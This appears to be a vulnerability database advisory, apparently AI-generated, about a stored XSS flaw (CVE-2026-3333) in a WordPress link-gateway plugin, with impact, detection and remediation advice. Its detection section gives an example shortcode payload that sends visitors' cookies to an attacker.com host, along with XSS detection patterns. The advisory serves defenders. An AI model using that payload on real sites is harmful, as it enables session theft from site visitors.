
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-3333 is a Stored Cross-Site Scripting (XSS) vulnerability in the MinhNhut Link Gateway plugin for WordPress, affecting all versions up to and including 3.6.1. The flaw exists in the plugin's linkgate shortcode due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on March 21, 2026, with Wordfence as the reporting CNA. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, NVD).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically insufficient sanitization of user-supplied shortcode attributes and missing output escaping in the plugin's template rendering. The vulnerable code paths are identifiable in classes.php (line 37) and templates/default/index.php (line 9), where user-controlled attributes passed to the [linkgate] shortcode are rendered without proper escaping (NVD, Wordfence). An authenticated attacker with at least Contributor-level access can embed a malicious shortcode containing arbitrary JavaScript into a WordPress page or post; the script executes in the browser of any user who subsequently visits that page. No user interaction beyond page visitation is required for the payload to trigger, as the scope is changed (cross-site impact).
Successful exploitation allows an authenticated Contributor-level attacker to persistently inject malicious JavaScript that executes in the context of any site visitor's browser session. This can lead to session cookie theft, credential harvesting, unauthorized actions performed on behalf of victims (including administrators), and potential site defacement or redirection to malicious content. Availability is not directly impacted, but confidentiality and integrity of user sessions and site content are at risk (NVD, Wordfence).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-3333 as of the available data. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated account with at least Contributor-level privileges on the target WordPress site, which limits the attacker pool but does not eliminate risk on sites with open registration or multiple contributors (Wordfence, NVD).
/wp-content/plugins/minhnhut-link-gateway/readme.txt.[linkgate] shortcode with a malicious attribute payload, for example: [linkgate url="javascript:void(0)" text="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"]./wp-admin/post.php or the REST API from Contributor-level accounts containing [linkgate shortcode with unusual attribute values including <script>, javascript:, or encoded variants (%3Cscript%3E).wp_posts table entries containing [linkgate] shortcodes with embedded <script> tags or event handler attributes (e.g., onerror=, onload=) in post content.[linkgate] shortcode, potentially carrying cookie or session data in query parameters.classes.php and templates/default/index.php for unauthorized modifications that may indicate further compromise.WordPress site administrators should update the MinhNhut Link Gateway plugin to version 3.6.2 or later, which contains the fix for insufficient input sanitization and output escaping (Wordfence). As an interim workaround, restrict Contributor-level user registration and audit existing Contributor accounts for untrusted users. Additionally, a Web Application Firewall (WAF) with XSS filtering rules — such as those provided by Wordfence — can help block exploitation attempts until the plugin is updated.
The vulnerability was reported and disclosed by Wordfence, which serves as the CNA for this CVE. No notable independent researcher commentary, media coverage, or significant social media discussion has been identified beyond standard vulnerability database listings and automated aggregators such as VulDB and INCIBE (NVD).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."